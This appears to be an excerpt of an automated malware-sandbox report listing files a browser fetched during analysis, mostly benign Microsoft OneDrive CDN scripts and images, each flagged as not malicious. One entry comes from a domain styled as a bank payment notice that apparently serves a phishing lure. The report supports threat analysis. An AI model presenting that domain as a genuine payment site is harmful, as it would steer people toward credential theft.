                                                  Preview:<svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="12" height="12" rx="2.5" fill="#292929"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M3.5 3C3.22386 3 3 3.22386 3 3.5C3 3.77614 3.22386 4 3.5 4H7.29289L3.14645 8.14645C2.95118 8.34171 2.95118 8.65829 3.14645 8.85355C3.34171 9.04882 3.65829 9.04882 3.85355 8.85355L8 4.70711V8.5C8 8.77614 8.22386 9 8.5 9C8.77614 9 9 8.77614 9 8.5V3.5C9 3.22386 8.77614 3 8.5 3H3.5Z" fill="#479EF5"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M9.5 1H2.5C1.67157 1 1 1.67157 1 2.5V9.5C1 10.3284 1.67157 11 2.5 11H9.5C10.3284 11 11 10.3284 11 9.5V2.5C11 1.67157 10.3284 1 9.5 1ZM2.5 0C1.11929 0 0 1.11929 0 2.5V9.5C0 10.8807 1.11929 12 2.5 12H9.5C10.8807 12 12 10.8807 12 9.5V2.5C12 1.11929 10.8807 0 9.5 0H2.5Z" fill="#999897"/>..</svg>..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (45476)
                                                  Category:dropped
                                                  Size (bytes):49725
                                                  Entropy (8bit):5.63616620645336
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:21D752FD9CD172008F95ED50BE272567
                                                  SHA1:C4A4EE05B6B5F3D140752C98C5E4F425F2DD1648
                                                  SHA-256:817D95EDC44F092FA4393C006F3521EE0572CD341105A4990F09ED244448BC5E
                                                  SHA-512:7A1D5441B817DAF004AEE4457962D1F16F9A023FB7C2FCC4845977A6915B16C994CFF744DBE3C6585DA736F4DC87E8E185BA6BD271D5A16C7818F054BC8B5B3B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[281],{2221:function(e,t,n){n.r(t),n.d(t,{initializeIcons:function(){return E}});var a=n(1337),i=n("fui.util_369");function r(e,t){void 0===e&&(e="");var n={style:{MozOsxFontSmoothing:"grayscale",WebkitFontSmoothing:"antialiased",fontStyle:"normal",fontWeight:"normal",speak:"none"},fontFace:{fontFamily:'"FabricMDL2Icons-0"',src:"url('".concat(e,"odsp-next-icons-0-433a26c6.woff') format('woff')")},icons:{DecreaseIndentLegacy:".",IncreaseIndentLegacy:".",SizeLegacy:".",PageLink:".",DatabaseSource:".",CommentSolid:".",ChangeEntitlements:".",Installation:".",WebAppBuilderModule:".",WebAppBuilderFragment:".",WebAppBuilderSlot:".",BullseyeTargetEdit:".",WebAppBuilderFragmentCreate:".",PageData:".",PageHeaderEdit:".",ProductList:".",UnpublishContent:".",DependencyAdd:".",DependencyRemove:".",EntitlementPolicy:".",EntitlementRedemption:".",SchoolDataSyncLogo:".",BugWarning:"
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (63603)
                                                  Category:downloaded
                                                  Size (bytes):130559
                                                  Entropy (8bit):5.272254843138107
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:87C1E4F634CF6F8AAAC8D0B54E18BC68
                                                  SHA1:746F885FD663A7B7F0B621C8FF8763F06A52B0A8
                                                  SHA-256:FB72ECE0B308948CC31DA5824E484070C21BD9EB6451179BACAB79C99BADC953
                                                  SHA-512:F1C741606B3A320FA60114A67A40A9ABC642B768CEE44CFF471BE2426B55083ED46DEDD712C3008790657D05D30436DA61E64C7D6BB3BFF2C86A1EDE39BD4F91
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp.react/odsp.react.lib-aa551099.js
                                                  Preview:/*! For license information please see odsp.react.lib-aa551099.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.react.lib"],{react_13:function(e){"use strict";var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;function i(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var a={};return"abcdefghijklmnopqrst".split("").forEach(function(e){a[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},a)).join("")}catch(e){return!1}}()?Object.assign:function(e,r){for(var o,s,c=i(e),d=1;d<arguments.length;d++){for(var l in o=Object(arguments[d]))n.cal
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (40143)
                                                  Category:downloaded
                                                  Size (bytes):40148
                                                  Entropy (8bit):5.196383978141877
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8E082311B2EB3FE2238C7719090E0D81
                                                  SHA1:BEF6BB33D2E5413E5EF77B114E43656A87837875
                                                  SHA-256:92BDB2AD63CCF3C8C59E6B1EB7208E5CED2019816C23B94DB7D8C7A00756EC8D
                                                  SHA-512:508CA9B00428D5541948F0AF7D965865EEF8CB38B603DF89DFBB965812991417CA0BF1DA4F2817C8A4D8AAB5AC7A3082623015115E4AA000E5625353BE051A0E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/465.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[465],{4301:function(e,t,n){n.d(t,{a:function(){return Ie}});var a={};n.r(a),n.d(a,{Decoder:function(){return _e},Encoder:function(){return pe},PacketType:function(){return fe},protocol:function(){return ue}});const i=Object.create(null);i.open="0",i.close="1",i.ping="2",i.pong="3",i.message="4",i.upgrade="5",i.noop="6";const r=Object.create(null);Object.keys(i).forEach(e=>{r[i[e]]=e});const o={type:"error",data:"parser error"},s="function"==typeof Blob||"undefined"!=typeof Blob&&"[object BlobConstructor]"===Object.prototype.toString.call(Blob),c="function"==typeof ArrayBuffer,d=e=>"function"==typeof ArrayBuffer.isView?ArrayBuffer.isView(e):e&&e.buffer instanceof ArrayBuffer,l=({type:e,data:t},n,a)=>s&&t instanceof Blob?n?a(t):u(t,a):c&&(t instanceof ArrayBuffer||d(t))?n?a(t):u(new Blob([t]),a):a(i[e]+(t||"")),u=(e,t)=>{const n=new FileReader;return n.onload=function(){const e=n.result.split(",")[1];t("b"+(e||
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):14895
                                                  Entropy (8bit):4.641843427673439
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:532D67159A4134064BCC921DF0DCCEB1
                                                  SHA1:A3897B4D2EAC6CC78211FEA626899D61CCF28062
                                                  SHA-256:8680D1CB15304BE7F4E0F12B63E2BBEF84E509607CEB7EF541BAC4695A729EFC
                                                  SHA-512:2374014322F250CD4D047F365E91B3440917E24ADC0507902C73C1F8BDCD5058527572163BC927215B340352183160329E22D0D6B77794567E82F1985156B1BF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/images/plt.sprite_422cd602.svg
                                                  Preview:<?xml version="1.0" encoding="utf-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><symbol viewBox="0 0 20 20" id="AddRegular" xmlns="http://www.w3.org/2000/svg"><path d="M10 2.5a.5.5 0 0 0-1 0V9H2.5a.5.5 0 0 0 0 1H9v6.5a.5.5 0 0 0 1 0V10h6.5a.5.5 0 0 0 0-1H10V2.5Z"/></symbol><symbol viewBox="0 0 20 20" id="CalendarFilled" xmlns="http://www.w3.org/2000/svg"><path d="M5.5 3A2.5 2.5 0 0 0 3 5.5V6h14v-.5A2.5 2.5 0 0 0 14.5 3h-9ZM17 7H3v7.5A2.5 2.5 0 0 0 5.5 17h9a2.5 2.5 0 0 0 2.5-2.5V7Zm-9 3a1 1 0 1 1-2 0 1 1 0 0 1 2 0Zm-1 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm4-4a1 1 0 1 1-2 0 1 1 0 0 1 2 0Zm-1 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm4-4a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"/></symbol><symbol viewBox="0 0 20 20" id="CalendarRegular" xmlns="http://www.w3.org/2000/svg"><path d="M7 11a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm1 2a1 1 0 1 1-2 0 1 1 0 0 1 2 0Zm2-2a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm1 2a1 1 0 1 1-2 0 1 1 0 0 1 2 0Zm2-2a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm4-5.5A2.5 2.5 0 0 0 14.5 3h-9A2.5
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):448
                                                  Entropy (8bit):4.984994552863576
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B653CEB95D851E846E92AD760C083AF6
                                                  SHA1:6483C737F5B5B0BA2B3E08ED1886B30B28E15800
                                                  SHA-256:C3125AD71C8E0DD28B26A9037BF29A3023991D80A9050DAEC1B8CD04E95B8A83
                                                  SHA-512:98D1EF9336C66F76AA506DF22C71F9181DCD0DCC0E0C1CA14B8C8FDB0E4D36D8E2F760BBA3D5C772B448BF0B3A1EA0A020DB4B1E9471864E07B294BAA18E1CBA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/favicon.ico
                                                  Preview:<!DOCTYPE html>.<html>.<head>.<title>404 Error</title>.<style>. body {. width: 35em;. margin: 0 auto;. font-family: Tahoma, Verdana, Arial, sans-serif;. }.</style>.</head>.<body>.<br />.<br />.<center>.<a href="http://www.ampps.com"><img src="http://www.softaculous.com/website/images/ampps/ampps_logo.png" /></a>.<h1>Not Found - 404</h1>.<p>The requested URL was not found on this server.</p>.</center>..</body>.</html>.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3546)
                                                  Category:dropped
                                                  Size (bytes):8027
                                                  Entropy (8bit):5.064490399846481
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DA93126E6D3F450C0B84BAEECA710506
                                                  SHA1:4FD79D8E6F93B799C586D93CB89EB30BF70826F7
                                                  SHA-256:C3E9A85674EDBC1F97DAEE23265AD6B5C4F8B74B6A39A07A1A647624469CDFC5
                                                  SHA-512:B4EE97311559A7536411984F72FBCD5931239584379961FEE6EE2FD570A8E2A9B066398CBF578E49C487409C63927EC16D6A0C5D68181782EC70B496FABC857F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[8],{4671:function(e,t,n){n(1160);var a=n("odsp.util_460"),i=n("knockout-lib"),r=function(){function e(e,t){var n=this;this._source=e,this._getKey=t,this._groupsByKeyId={},this.groups=i.observableArray(),this._initializeGroups(),(0,a.QK)(this.groups,function(){n._mapping.dispose()})}return e.group=function(t,n){return new e(t,n).groups},e.prototype._initializeGroups=function(){var e=this;this._mapping=this._source.map({mappingWithDisposeCallback:function(t){var n=e._getKey(t),a=JSON.stringify(n),r=e._groupsByKeyId[a];return r?r.values.push(t):(r={key:n,values:i.observableArray([t])},e._groupsByKeyId[a]=r,e.groups.push(r)),{mappedValue:a,dispose:function(){r.values.peek().length>1?r.values.remove(t):(delete e._groupsByKeyId[a],e.groups.remove(r))}}}})},e}();t.a=r}.,3391:function(e,t,n){n.d(t,{a:function(){return p}});var a=n("tslib_102"),i=n(1135),r=n(1137),o=n(3110),s=n(20),c=n(2457),d=n("knockout-lib");functi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (7030)
                                                  Category:dropped
                                                  Size (bytes):7080
                                                  Entropy (8bit):5.446666911493618
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7A644F10A5731C70C6F6EE35A858F00C
                                                  SHA1:0E4588D8AFA0BE95AFF8EB9D82E35BB47C8F8A8A
                                                  SHA-256:23E160E5446EE4D46B9BC477EEFF7A718416F9CDE3FBD29263D0684CFA940E81
                                                  SHA-512:E951CFE10AB9F593155C062128E19758872935E0066ABA2B2E3DBA8F64C59908E65183E87CE723A2B3D3E763A47743015C13E59F369374439D1AAB49D015DDDC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[9],{3516:function(e,t,n){n.d(t,{a:function(){return v},b:function(){return S},c:function(){return D},d:function(){return y}});var a,i=n("tslib_102"),r=n(1933),o=n(785),s=n(500),c=n(66),d=n(2786),l=n(1807),u=n(2927),f=n("odsp.util_460"),p=n(2979),m=f.HW.isActivated("b7f49711-c56b-4749-a1bc-a91875390f45"),_=f.HW.isActivated("54b0c38f-b2dc-4be3-98ff-627ec8e4bdef"),h=((a={})[d.c.icon]={key:"type",index:0,isVisibleMobile:!0,isCollapsable:!1,type:l.a.FileIcon},a[d.c.name]={key:"name",index:1,isRowHeader:!0,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Name},a[d.c.title]={key:"Title",index:1,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Title},a[d.c.shareHeroCommand]={key:"_shareHeroCommand",index:2,isVisibleMobile:!1,isCollapsable:!0,minWidth:16,width:18,type:l.a.ShareCommand},a[d.c.calloutInvoker]={key:"_calloutInvoker",index:3,isVisibleMo
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):9278
                                                  Entropy (8bit):4.600246158513827
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C711D55F5C2D3A41FD6A449CF44F5CED
                                                  SHA1:4FAFFF42F90AC7D2A4CCD99865CC8C188D6A9B09
                                                  SHA-256:EB50CA4BF56D418B745AD1C77A8B54B2138FB87A0A219E464EAE8CED4C949C87
                                                  SHA-512:9D97883DA54F78C683F2B1CAA8CDDF56D4F048CB287CDD2AC4691C553A15643CA1BE0CB06BCCEB54C319ACB7C52BC120E169A832FC1F660652ADC6B447068961
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_sharedwithme.svg
                                                  Preview:<svg id="GRAPHICS" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="208" height="208" viewBox="0 0 208 208"><defs><linearGradient id="linear-gradient" x1="94.855" y1="105.776" x2="94.855" y2="60.312" gradientUnits="userSpaceOnUse"><stop offset="0.002" stop-color="#f5b453"/><stop offset="0.295" stop-color="#fed494"/></linearGradient><linearGradient id="linear-gradient-2" x1="78.418" y1="193.452" x2="112.154" y2="135.018" gradientUnits="userSpaceOnUse"><stop offset="0.002" stop-color="#f5b453"/><stop offset="0.581" stop-color="#fed494"/></linearGradient><radialGradient id="radial-gradient" cx="798.044" cy="19.099" r="19.648" gradientTransform="matrix(0.998, 0.068, -0.069, 1.006, -705.89, 6.156)" gradientUnits="userSpaceOnUse"><stop offset="0.338" stop-color="#797673"/><stop offset="0.513" stop-color="#979592"/><stop offset="0.701" stop-color="#b1afac"/><stop offset="0.869" stop-color="#c1bebc"/><stop offset="1" stop-color="#c6c4c2"/></radialGradient></
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (12167)
                                                  Category:downloaded
                                                  Size (bytes):12172
                                                  Entropy (8bit):5.29345979897129
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:82E5979F6A295176259669DE5B0C5B9E
                                                  SHA1:9ECA74DEA548C2E98F400AFAF97AE2F4D270EC95
                                                  SHA-256:FE033421825D9E79125DDB76075CD1F5D9BE7A6CB8B7660DAD76F5D3A1992CC5
                                                  SHA-512:6A6EC38CB04956598477A00E38EC4B9E1D648A9CE7E68E1FAB068F652B18C0F1C535ED6CD0378EB4321095991F00639114F0527BA54294F49567655FA9F136CA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/83417.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[83417],{383417:(e,t,n)=>{n.d(t,{Sg:()=>b});var a=n(295610),i=n(686247),r=n(188830),o=n(523499),s=n(693343),c=n(412616),d={DefaultSkip:0,DefaultTop:8,DefaultFaceTop:3,MaxTop:100},l=function(e){function t(n,a){var i=e.call(this,a)||this;return i.status=n,void 0!==typeof Object.setPrototypeOf&&Object.setPrototypeOf(i,t.prototype),i}return(0,a.__extends)(t,e),t}(Error),u=n(224252),f=n(822866);function p(e){return isFinite(e)&&!isNaN(e)}var m={timeoutMs:15e3,backoffTimeMultiplierMs:200,maxRetries:3,fallbackBackoffTimeFunction:function(e,t){return Math.pow(2,e)*t}},_="x-ms-client-request-id",h="Rest.performHealthCheck. Failed to reach our health URL. This means there is a client network issue.",b=function(){function e(){}return e.get=function(t,n,a,i,r,s,c,d){return void 0===d&&(d=o.F7.any),e.getWithResponse(t,n,a,i,r,s,c,d).then(function(e){return e[0]})},e.getWithResponse=function(t,n,a,r,s,c,d,
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (19653)
                                                  Category:downloaded
                                                  Size (bytes):101512
                                                  Entropy (8bit):5.306734631380608
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:11FFA71447A35FCAC8AA0BA677957772
                                                  SHA1:CB477D20C333221E6B0D79CABD2DC9DA442220E7
                                                  SHA-256:E1CFAB07B19AB814F3EA1E5048D886DF4E24C4DEFB1A9817EC1F086EB543B2CE
                                                  SHA-512:C976BE933543616DBF77969A2BCD37E7165366993B0EFEFFA6D8ACD41276CBDA6DE4E7D0FBF5424D1185AB2F70A4A77802D90BBCA6590F84D8F23ADA752B9315
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/47069.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[47069],{899171:(e,t,n)=>{n.d(t,{w:()=>r});var a=n(302109),i=n(771690);function r(e,t,n){var r=(0,a.X)(e,function(e){return t===e||e.hasAttribute(i.Y)},n);return null!==r&&r.hasAttribute(i.Y)}}.,214141:(e,t,n)=>{n.d(t,{k:()=>T});var a,i=n(295610),r=n(408156),o=n(375967),s=n(799122),c=n(445668),d=n(17283),l=n(951951),u=n(589726),f=n(73227),p=n(258623),m=n(265899),_=n(816178),h=n(2218),b=n(126922),g=n(899171),v=n(549040),y=n(338185),S=n(887602),D="data-is-focusable",I="data-focuszone-id",x="tabindex",C="data-no-vertical-wrap",O="data-no-horizontal-wrap",w=999999999,E=-999999999;function A(e,t){var n;"function"==typeof MouseEvent?n=new MouseEvent("click",{ctrlKey:null==t?void 0:t.ctrlKey,metaKey:null==t?void 0:t.metaKey,shiftKey:null==t?void 0:t.shiftKey,altKey:null==t?void 0:t.altKey,bubbles:null==t?void 0:t.bubbles,cancelable:null==t?void 0:t.cancelable}):(n=document.createEvent("MouseEvents")
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (45422)
                                                  Category:downloaded
                                                  Size (bytes):45452
                                                  Entropy (8bit):5.401594446928274
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F3EBA5DB2461296A83A9193EB2745C3E
                                                  SHA1:33EBFEB2AFB297730D95049C9ECD8013EE8E8657
                                                  SHA-256:50CA1C9696B64F1F2EC30C6901D15D17C739F1BF022F349225ECCB71E97E694B
                                                  SHA-512:2DA39E519DAB87F6C5B2CB864560029B4B2DADA143E6A3DD954C569EEBBC5EDA1F5393E42136E547E71E3C089649C06DEDFDB2AFD501FB89AC680EEC1E2CFEF0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.utilities/fui.util-87c310c7.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.util"],{"fui.util_369":(e,t,n)=>{n.d(t,{Mh:()=>Wt,su:()=>ft,uq:()=>I,vm:()=>Ae,kb:()=>S,MR:()=>Re,wR:()=>v,dN:()=>Kt,P4:()=>y,qw:()=>vn,S9:()=>Z,mA:()=>$,N9:()=>je,so:()=>l,xD:()=>d,o7:()=>ee,K9:()=>A,fl:()=>X,hQ:()=>J,wX:()=>m,s9:()=>h,hU:()=>_,$Q:()=>P,UH:()=>Pt,fz:()=>le,Sx:()=>Bt,bg:()=>be,FX:()=>Ot,Vm:()=>St,rz:()=>Dt,pj:()=>he,dY:()=>An,aE:()=>Ne,vJ:()=>gn,KN:()=>Et,Gk:()=>fn,ri:()=>Xt,UT:()=>Zt,QA:()=>We,J1:()=>jt,oT:()=>Jt,yh:()=>It,B4:()=>_n,KL:()=>an,Cu:()=>fe,Ss:()=>p,TV:()=>ge,VI:()=>bn,XG:()=>g,DA:()=>$t,Kd:()=>tn,Gm:()=>hn,fy:()=>st,ZG:()=>tt,o3:()=>De,ti:()=>xe,zc:()=>we,vc:()=>en,k0:()=>nn,XB:()=>on,Es:()=>Yt,$o:()=>rn,OX:()=>C,Mr:()=>Fe,hw:()=>O,n6:()=>Ut,dU:()=>F,s5:()=>Qt,uX:()=>Se,e5:()=>f,gZ:()=>Tt,hh:()=>un,ni:()=>ln,Yx:()=>dn,Fg:()=>cn,f2:()=>sn,xw:()=>qt,kM:()=>U,Bv:()=>yt,JQ:()=>Rt,i3:()=>Ct,jB:()=>Ue,AZ:()=>Vt,Ww:()=>En,NS:()=>wn,sE:()=>Qe,J4:()=>qe,cA:()=>He,wY:()=>Pe,AN:()=>Gt
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (10401)
                                                  Category:dropped
                                                  Size (bytes):520176
                                                  Entropy (8bit):5.031133177525619
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:29E09A3CA3CB3F1EF2F8B16B516DD2B4
                                                  SHA1:98DAD9D5E615A63826AEF433A5F018FA946F800E
                                                  SHA-256:17EC1DDD1062F6F3255C5ABB12850EC779BC782108A3BD0FC49175F053BFAD47
                                                  SHA-512:B8DC2AC487580BE785E6CFCBA7415A3DA869E4727D6F8B54ECB43A83219A5C541B0402C568F245583D57BB31E744B18DF90A978B46AA43F85B32BF4EBD829A9B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx","deferred.resx"],{8303:function(e){e.exports=JSON.parse('{"needsPasswordLabel":"{0} requires a password.","enterPassword":"Enter password","enterPasswordDialogLabel":"Enter password to open this PDF file","invalidPasswordPrompt":"Incorrect password. Please try again.","dialogOk":"OK","dialogCancel":"Cancel","zoomPageFitSize":"Window size","zoomPageFitWidth":"Window width","previousPageTooltip":"Previous page","nextPageTooltip":"Next page","zoomTooltip":"Zoom","zoomOutTooltip":"Zoom out","zoomInTooltip":"Zoom in","rotateTooltip":"Rotate","openInNewWindowTooltip":"Open in new window","searchTooltip":"Search","previousTooltip":"Previous result","nextTooltip":"Next result","upCommandAria":"Go to the previous page.","downCommandAria":"Go to the next page.","zoomCommandAria":"Change the current zoom level. Press enter to open the option menu and esc to close it.","zoomOutCommandAria":"Zoom out the d
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):36610
                                                  Entropy (8bit):7.990077025288505
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:A729D45A65E2B9849159E08EF6FD5F12
                                                  SHA1:75A14F3E8AC5D4ECA6ADE8771C84F4F5328301D6
                                                  SHA-256:11980ECD03E02439A6300EEFF5DBF9A48BD52EEBF14BBCC246752B0CE5BAF223
                                                  SHA-512:89460BCACBEDBA68CD7FE67E675C5DFD76E6C43D87ED13D03EEBF4A66BC298C85F96605306EB879D4ED89BFE0E53699A11A09BBA866226F767AB97203395A6B3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/error/error_exclamation_v3.webp
                                                  Preview:RIFF....WEBPVP8X..............ALPH.k.....m.....%.._XJ..".?..g..s........96-...3.....[.@... .WC.....I..h..T.i..5....u.F..C?.....m.0I....... GA.AT!.......`..,t*4X0`..@..z.51.YT..[.$K.$.R........~..{2@.3.X^D....@.....+....x..{...m..$9k....1...R.K.5..f...../`..,}A....d.v.l.9.:..7.T-"|A.]..m[.. .B..V....}.{.m..h.....v..'.n.3..z..........=<.<7s3.>..C...!..Ku.u..r..qV']].7"d.....TD ...$i.v..........o....=e0............<...D..o.....y`....'.v8...j.., %.55.1...tC....[..nZ.[...G......."../$..L...F.....L..sC..6.f......ao......7...\.Hs=..=>..s...".j.Q..AD...w3..-.....V..I....kh..?'.M..v.......w6...N........1...T..c.]......[4..k..:....l.u........|............N6..(.w.....a..*..f..F.....6)..$X. O.....'M.T..7j....4.".F...)....z..X..........=.~..:{.LPQ..H.f. O..T.^......j.x....>...2s.."..p.....~.....(..l.........C....1s.B...]8y...A.V.i......m.....t.A.....G........7.24..0.iB.y......#xl..7c.o.^..l.x....c..i|...=.Py.g._|.._......\.Bod}....E.RU9.....d..Z......S.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (25299)
                                                  Category:downloaded
                                                  Size (bytes):289524
                                                  Entropy (8bit):5.4587654087686746
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D109895A35092CBB153870BBB7548F21
                                                  SHA1:ABED27172DADE6509F377FACC638787EC2131CA1
                                                  SHA-256:6B7A19C42F96C6D50BD72DA804937D1C007DE91DD92928A543B3A47E43460E15
                                                  SHA-512:F00C0BCFBB159C73644DB41BF69A0FB53FDD0D28361F74D3AF94DF032BC60472BD8C9211A7FE5D92E0EFA4261ED3D44332612DDDAE50D10140A2240515606BF8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/72.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[72,245,285,2097,2100,1226,1225,85],{4112:function(e,t,n){function a(e){return e&&e.webAbsoluteUrl===e.siteAbsoluteUrl}n.d(t,{a:function(){return a}})}.,5800:function(e,t,n){n.d(t,{a:function(){return i}});var a=n(4112);function i(e){return!!e&&(0,a.a)(e)&&!!e.groupId&&!!e.isTeamsConnectedSite&&!e.isTeamsChannelSite}}.,5805:function(e,t,n){n.d(t,{a:function(){return u}});var a=n("tslib_102"),i=n("react-lib"),r=n(1023),o=n(1583),s=n(1879),c={iconName:"FavoriteStar"},d={iconName:"FavoriteStarFill"};function l(e){var t;return(null===(t=e.actionState)||void 0===t?void 0:t.isToggled)?(0,a.W_)((0,a.W_)({},e),{iconProps:d,ariaLabel:s.d,title:s.d}):(0,a.W_)((0,a.W_)({},e),{iconProps:c,ariaLabel:s.a,title:s.a})}function u(e){return{key:r.a,iconOnly:!0,action:i.createElement(o.b,{itemKeys:[e]}),postProcess:l,automationId:"FieldRender-Followed"}}}.,5785:function(e,t,n){n.d(t,{a:function(){return s}});var a=n("react-lib")
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (14852)
                                                  Category:downloaded
                                                  Size (bytes):34611
                                                  Entropy (8bit):5.215847441326058
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E9950B542F136586F6B9800FAF1792C2
                                                  SHA1:55FDE73EF5D04D761F72C5F5DA590E2F0DCD7799
                                                  SHA-256:AA19748A46594E7D3BAEC7C2C62BC787A3D77438043CDB4A433C5B57D7FFA65D
                                                  SHA-512:F57DDBC5CA15E0A86E4E19E0408BC1ED223B958EAC81A547D3A12AFFFDFA15F22C7EAF070BB175C81B7001D62BC4F1A648B4EE6D934C3C8F00F1B0C5D33751EB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/267.js
